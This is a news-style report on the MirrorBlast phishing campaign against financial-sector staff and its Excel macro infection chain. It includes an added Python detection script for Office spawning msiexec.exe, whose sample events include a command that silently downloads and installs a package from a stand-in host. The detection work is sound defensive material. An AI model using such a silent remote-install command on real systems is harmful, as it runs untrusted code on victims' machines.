MirrorBlast Phishing Campaign Targets Finance Institutions

Security researchers have uncovered an ongoing phishing campaign dubbed MirrorBlast. The campaign appears to target professionals working in the financial sector.

MirrorBlast was spotted by a research team at ET Labs more than a month ago. The campaign uses malicious links inside the phishing emails that direct the victim to what researchers call a "weaponized" Excel file.

Malicious MS Office files usually carry embedded macros that do the attacker's work, and MirrorBlast is no different. Most anti-malware suites have some defense against this class of threat; what makes the Excel file used by MirrorBlast particularly dangerous is the nature of its embedded macro.

The macro in the MirrorBlast file is described as "extremely lightweight". With so little code to inspect, static scanners have few suspicious patterns to key on, which is how the file slips past a lot of anti-malware systems.

Researchers from Morphisec obtained a sample of the malware and analyzed it. The infection chain triggered by the Excel file resembles the techniques and attack vectors used by a Russian-language advanced persistent threat actor tracked as TA505, also known as Graceful Spider.

The link in the phishing emails leads to fake pages that mimic OneDrive directories or SharePoint document pages. Whichever variant the victim sees, the chain always ends with the weaponized Excel file.

The social engineering lure focuses, somewhat predictably, on Covid. The fake messages are crafted to look like company memos about restructuring arrangements and workplace changes related to the Covid situation.

Luckily for many, the malicious macro in this sample can only execute on 32-bit installs of MS Office because of compatibility issues; that is a property of this particular sample, not a general immunity of 64-bit Office to macro attacks. The macro runs JavaScript code that first checks whether the host is a sandbox, then uses the legitimate, signed Windows binary msiexec.exe to download and run an installer package, so the download and install look like an ordinary software installation.
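The detection opportunity in that chain is the process relationship: an Office application spawning msiexec.exe with a remote package source. The following is an added example of that check run over constructed process-creation events, written here for illustration; it is not code from the page, from Morphisec or from the campaign. The event field names (parent_image, image, command_line) are modelled on Sysmon Event ID 1 and are an assumption, the sample events and the URL in them are constructed, and extending the parent list beyond Excel to Word and PowerPoint is a generalization of the page's Excel-only case.

```python
import ntpath
import re
from typing import Iterable, Optional

# Office parents of interest. MirrorBlast uses Excel; the other two names are an
# assumption that generalises the rule to the rest of the Office suite.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# A package pulled over HTTP(S) or from a UNC share rather than a local path.
REMOTE_SOURCE = re.compile(r"(https?://\S+|\\\\[^\\\s]+\\\S+)", re.IGNORECASE)
# msiexec switches that suppress the installer UI (/q, /qn, /qb, /quiet).
QUIET_FLAG = re.compile(r"(?:^|\s)/(?:q|qn|qb|quiet)\b", re.IGNORECASE)

# Constructed sample events (assumption: Sysmon EID 1 style field names).
# Event 0 mirrors the page's chain: 32-bit Excel (Program Files (x86)) launching
# the SysWOW64 msiexec with a remote package and a silent install flag.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "command_line": r"msiexec.exe /i http://files.example.invalid/status.msi /qn"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i http://files.example.invalid/tool.msi"},
    {"parent_image": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "command_line": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\report.msi"},
    {"parent_image": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": r"C:\Windows\splwow64.exe 12288"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, works on any host OS."""
    return ntpath.basename(path).lower()


def classify_event(event: dict) -> Optional[str]:
    """Return 'high', 'medium' or None for a single process-creation event.

    high   : Office parent -> msiexec.exe with a remote package source
    medium : Office parent -> msiexec.exe with a local package (still unusual)
    None   : not an Office -> msiexec.exe pairing
    """
    if _basename(event.get("image", "")) != "msiexec.exe":
        return None
    if _basename(event.get("parent_image", "")) not in OFFICE_PARENTS:
        return None
    if REMOTE_SOURCE.search(event.get("command_line", "")):
        return "high"
    return "medium"


def scan(events: Iterable[dict]) -> list:
    """Run classify_event over a stream of events and collect the findings."""
    findings = []
    for ev in events:
        severity = classify_event(ev)
        if severity is None:
            continue
        cmd = ev.get("command_line", "")
        findings.append({
            "severity": severity,
            "parent": _basename(ev.get("parent_image", "")),
            "command_line": cmd,
            # A silent install flag means the user would see no installer window.
            "quiet": bool(QUIET_FLAG.search(cmd)),
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The explorer.exe event is deliberately left unflagged: the rule is scoped to the Office-to-msiexec relationship the page describes, and a broader "msiexec with a remote source" rule would need its own baseline of legitimate deployment traffic before it is usable.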

TA505, the group suspected of being behind the MirrorBlast phishing campaign, is described as a financially motivated threat actor that continually shifts its attack vectors and techniques to stay ahead of researchers.